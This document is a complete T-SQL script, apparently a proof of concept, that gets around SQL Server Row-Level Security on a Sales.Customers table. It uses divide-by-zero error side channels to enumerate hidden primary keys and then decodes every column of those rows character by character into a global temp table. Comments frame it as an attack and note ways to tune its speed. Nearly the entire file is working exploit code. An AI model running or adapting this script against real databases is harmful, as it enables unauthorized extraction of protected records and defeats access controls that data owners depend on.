--It is optional to allow some rows to be accessed via RLS
--This version ignores any allowed rows and brute forces everything.

--IF SESSION_CONTEXT(N'SalesTerritory') IS NULL
--BEGIN
--	EXEC sp_set_session_context 'SalesTerritory', 'Far West', 1
--END
--GO

SET NOCOUNT ON

/*******************************************************************
* Declare and set the variables for this run 
********************************************************************/
DECLARE
    @ServerName					varchar(255)			= 'localhost' 
    ,@SchemaName				varchar(255)			= 'Sales'
    ,@TableName					varchar(255)			= 'Customers'	
	,@PrimaryKey				varchar(255)			= 'CustomerID'	
    ,@EXECUTE					tinyint					= 1		-- 1 = execute, 0 = print
    ,@NOLOCK					tinyint					= 1		--1 = WITH(NOLOCK), 0 = default lock (committed)
    ,@SHOW_COLUMNS_ONLY			bit						= 0		--1 = columns only and exit, 0 = don't show column list
	,@Exclude					varchar(500)			--= 'BankAccountBranch,BankAccountCode' --CSV list of columns that will be ignored
	,@DropTempTable				bit						= 0		--1 = drop ##RLS when done, 0 = leave ##RLS for further analysis
	,@PrimaryKeyMax				varchar(10)				= '10000'
	,@TopRows					varchar(10)				= '100'		--NULL = all rows


/*******************************************************************
* Temporary table definitions
********************************************************************/
DECLARE @Columns TABLE (
	ColumnID					int
	,ColumnName					varchar(255)
	,ColumnLength				smallint
	,HasText					tinyint
)

/********************************************************************
* Variables set internally
*********************************************************************/
DECLARE
	@SQL						varchar(max)
	,@InternalWhere				varchar(max)
	,@OrderList					varchar(max)


INSERT INTO @Columns
EXEC (
    'SELECT
		SC.column_id
		,SC.name
		,CASE 
			WHEN sc.max_length = -1 THEN 100
			--WHEN sc.max_length = 0 THEN 100
			WHEN ST.name IN (' + '''' + 'nchar' + '''' + ',' + '''' + 'nvarchar' + '''' + ') THEN SC.max_length	/ 2
			WHEN ST.name IN (' + '''' + 'char' + '''' + ',' + '''' + 'varchar' + '''' + ') THEN SC.max_length
			ELSE 40 --hard code numbers to 60 wide. Verify this with different scenarios
		END	MaxLength
		,CASE
			WHEN ST.name IN (' + '''' + 'varchar' + '''' 
				+ ',' + '''' + 'nvarchar' + ''''
				+ ',' + '''' + 'char' + ''''
				+ ',' + '''' + 'nchar' + '''' + ') THEN 1
			ELSE 0
		END HasText
    FROM sys.objects SO
        INNER JOIN sys.columns SC
            ON so.object_id = sc.object_id
        INNER JOIN sys.schemas SS
            ON so.schema_id = ss.schema_id
		INNER JOIN sys.types ST
			ON SC.system_type_id	= ST.system_type_id
			AND SC.user_type_id		= ST.user_type_id
		LEFT JOIN string_split(' + '''' + @Exclude + '''' + ',' + '''' + ',' + '''' + ') SSTR
			ON SC.name COLLATE SQL_Latin1_General_CP1_CI_AS 			= SSTR.value COLLATE SQL_Latin1_General_CP1_CI_AS 
    WHERE so.name COLLATE SQL_Latin1_General_CP1_CI_AS = ' + '''' + @TableName + '''' + ' COLLATE SQL_Latin1_General_CP1_CI_AS 
        AND ss.name COLLATE SQL_Latin1_General_CP1_CI_AS = ' + '''' + @SchemaName + '''' + ' COLLATE SQL_Latin1_General_CP1_CI_AS 
        AND ST.system_type_id NOT IN (240)
		AND SSTR.value					IS NULL
    ORDER BY sc.name'
)


IF @SHOW_COLUMNS_ONLY = 1
BEGIN
	SELECT * FROM @Columns ORDER BY ColumnID
	--GOTO NO_EXECUTE
END


IF (SELECT COUNT(*) FROM @Columns) = 0
BEGIN
    RAISERROR('No columns present: Check that you are running the script from the correct database, that the name of the table is correct and that you have permission to select from the table.',5,1)
	--GOTO NO_EXECUTE
END


/********************************************************************
* Primary Key Columns
*
* The sample script requires a primary key column for it to work
* automatically. The primary key columns for the table specified
* are dynamically inserted into @PrimaryKeys using system tables.
*
* A candidate key can be specified via the @PrimaryKey variable
* if it is not specified on the table but the key is known.
*
* The same purpose could be achieved with ROW_NUMBER() for tables
* without a primary key. 
*********************************************************************/
DECLARE @PrimaryKeys TABLE (
	PrimaryKeyName				sysname
	,ColumnName					sysname
	,RowNumber					int			identity
)

INSERT INTO @PrimaryKeys (
	PrimaryKeyName
	,ColumnName
)
VALUES (@PrimaryKey,@PrimaryKey)

/*********************************************************************
* Create a copy of the source table
* Change the column types to NVARCHAR
**********************************************************************/
BEGIN TRY
	CREATE TABLE ##RLS (ID int)
END TRY
BEGIN CATCH
	PRINT '##RLS Table not present. Creating'
END CATCH
DROP TABLE ##RLS

DECLARE @OutputTable	varchar(max)
SELECT @OutputTable = 'CREATE TABLE ##RLS (
'

SELECT @OutputTable += CASE WHEN ColumnID = 1 THEN '' ELSE ',' END 
	+ ColumnName
	+ '	'
	+ CASE WHEN ColumnID = 1 THEN 'int
' ELSE 'nvarchar(' + CONVERT(varchar(10),ColumnLength) + ')
' END 
FROM @Columns
ORDER BY ColumnID

SELECT @OutputTable += '
)
'

EXEC(@OutputTable)

--Force the PK in the temp table.
EXEC('CREATE UNIQUE CLUSTERED INDEX IX_TMPRLS ON ##RLS (' + @PrimaryKey + ')')

--Create the list of actual IDs in the table
--See separate example showing how to search for valid IDs, but it is essentially the same as other divide by zero checks
--Values are placed into a global temp table that can be accessed inside the EXEC and in the calling process
EXEC('
DECLARE @LEN		int = 0
	,@KeyColumn		int = 0
	,@Character		nchar(1)

DECLARE @Customers TABLE (
	' + @PrimaryKey	+ '		int
)

----Record customers that are allowed by the current users RLS rules
INSERT INTO ##RLS (' + @PrimaryKey	+ ')
SELECT ' + @PrimaryKey	+ '
FROM ' + @SchemaName + '.' + @TableName + '

WHILE @KeyColumn <= ' + @PrimaryKeyMax + '
BEGIN
	WHILE @LEN <= 12
	BEGIN
		BEGIN TRY
			INSERT INTO ##RLS (' + @PrimaryKey	+ ')
			SELECT C.' + @PrimaryKey	+ '
			FROM ' + @SchemaName + '.' + @TableName + ' C
				LEFT JOIN ##RLS TC
					ON C.' + @PrimaryKey	+ '		= TC.' + @PrimaryKey	+ '
			WHERE TC.' + @PrimaryKey	+ '						IS NULL
				AND C.' + @PrimaryKey	+ '					= @KeyColumn
				AND 1/(LEN(CONVERT(varchar(12),C.' + @PrimaryKey	+ ')) - @LEN)	= 0
		END TRY
		BEGIN CATCH
			BEGIN TRY
				INSERT INTO ##RLS (' + @PrimaryKey	+ ')
				SELECT @KeyColumn
				BREAK
			END TRY
			BEGIN CATCH
				PRINT ' + '''' + 'Duplicate - do not insert' + '''' + '
			END CATCH
		END CATCH

		SELECT @LEN += 1
	END

	
	SELECT @KeyColumn += 1
	SELECT @LEN = 0
END
')

--Variables for the column cursor
DECLARE
	@ColumnName					varchar(255)
	,@ColumnLength				smallint
	,@HasText					tinyint

DECLARE crsColumns CURSOR
FOR SELECT
	ColumnName
	,ColumnLength
	,HasText
FROM @Columns
WHERE ColumnID > 1
ORDER BY ColumnID

OPEN crsColumns

FETCH NEXT FROM crsColumns INTO @ColumnName, @ColumnLength, @HasText

--Dynamic version of the column level check
--Changes all columns to strings
--Does a character-by-character check and updates the the global temp table with the found values.
--Loop through each character of each column
--Each substring is converted to NCHAR and compared against each --ASCII character from 32 (SPACE) to 127 (DEL)
--When the character matches, the case statement returns 0
--causing a divide by zero error. Each character is added to the
--string for the current column 
--It repeats until all characters in all columns are decoded

WHILE @@FETCH_STATUS = 0
BEGIN
	SELECT @SQL = '
		DECLARE @ID			int
			,@Character		int	= 0
			,@InnerCharLen	int = 0

		DECLARE crsRLS CURSOR
		FOR SELECT ' + ISNULL('TOP ' + @TopRows,'') + ' ' + @PrimaryKey + '
		FROM ##RLS C
		ORDER BY ' + @PrimaryKey + '

		OPEN crsRLS
		FETCH crsRLS INTO @ID

		WHILE @@FETCH_STATUS = 0
		BEGIN
			DECLARE @SubstringLen int = 1
			--SELECT @InnerCharLen = (SELECT LEN(' + @ColumnName + ') FROM ' + @SchemaName + '.' + @TableName + ' C WHERE C.' + @PrimaryKey + ' = @ID)
			WHILE @SubstringLen <= (' + CONVERT(varchar(10),@ColumnLength) + ')
			BEGIN
				SELECT @Character = 32 --Start with space character --Letters, etc. were not excluded since they end at 57. Also then includes characters for time, etc.
				WHILE @Character < 127 --Only process the ASCII character set. Could be expanded at the cost of time
				BEGIN
					BEGIN TRY
						INSERT INTO ##RLS (' + @PrimaryKey + ', ' + @ColumnName + ')
						SELECT C.' + @PrimaryKey + ', C.' + @ColumnName + '
						FROM ' + @SchemaName + '.' + @TableName + ' C
						WHERE C.' + @PrimaryKey + ' = @ID
							AND 1 / (
									CASE SUBSTRING(CONVERT(NVARCHAR(' + CONVERT(nvarchar(10),@ColumnLength) + '),' + @ColumnName + '),@SubstringLen,1) COLLATE SQL_Latin1_General_CP1_CS_AS WHEN NCHAR(@Character) THEN 0 ELSE 1 END --Use COLLATE to get the correct case. Increases time to decode.
								) = 0
					END TRY
					BEGIN CATCH
						UPDATE ##RLS 
						SET ' + @ColumnName + ' = ISNULL(' + @ColumnName + ',' + '''' + '''' + ') + NCHAR(@Character) 
						WHERE ' + @PrimaryKey + ' = @ID
						--Sleep for 1 second
						--Will reduce CPU usage and space out errors
						--at the expense of attack speed
						--WAITFOR DELAY ' + '''' + '00:00:01' + '''' + '
						BREAK --Stop processing this row / character when the correct value is found
					END CATCH

					SELECT @Character += 1
				END
				SELECT @SubstringLen += 1

			END
			SELECT @SubstringLen = 1
			SELECT @InnerCharLen = 0
			FETCH crsRLS INTO @ID
		END

		CLOSE crsRLS
		DEALLOCATE crsRLS'
	EXEC(@SQL)
	--PRINT @SQL --This shows the inner dynamic SQL statement as it runs. Can be used for troubelshooting or reference.

	FETCH NEXT FROM crsColumns INTO @ColumnName, @ColumnLength, @HasText
END

CLOSE crsColumns
DEALLOCATE crsColumns

SELECT * FROM ##RLS

IF @DropTempTable = 1
BEGIN
	DROP TABLE ##RLS
END

NO_EXECUTE:

GO
